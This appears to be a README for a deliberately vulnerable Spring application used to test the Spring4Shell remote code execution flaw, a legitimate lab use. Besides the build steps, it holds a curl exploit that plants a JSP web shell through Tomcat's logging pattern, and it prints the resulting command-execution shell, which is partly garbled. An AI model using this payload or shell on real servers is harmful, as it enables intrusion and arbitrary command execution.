Vulnerable Spring Framework Application for Testing Spring4Shell


This application is intentionally built for testing  Remote Code Execution on Spring Core aka Spring4Shell. 

How do I use this?

First, this was tested on Ubuntu 21.04 (because I hate myself) and OpenJDK 11. Once you've accepted that, snag the code and build it.

git clone
cd spring4shell_vulnapp
mvn package

That should generate a war file in ./target/. You can load the war into Tomcat. How? Something like:
chmod +x apache-tomcat-8.5.77/bin/*.sh
cp target/vulnerable- apache-tomcat-8.5.77/webapps/

It should be ready to test! The original Tomcat web shell exploit is good as far as I'm concerned:

curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))" http://localhost:8080/vulnerable-

The file is dropped to disk:

cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp 
- if("j".equals(request.getParameter("pwd"))){ in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while(({ out.println(new String(b)); } } -


Another exploit for RCE in the spring Framework was released. You can check the exploit on this Github repo.

Get Spring4Shell Vulnerable App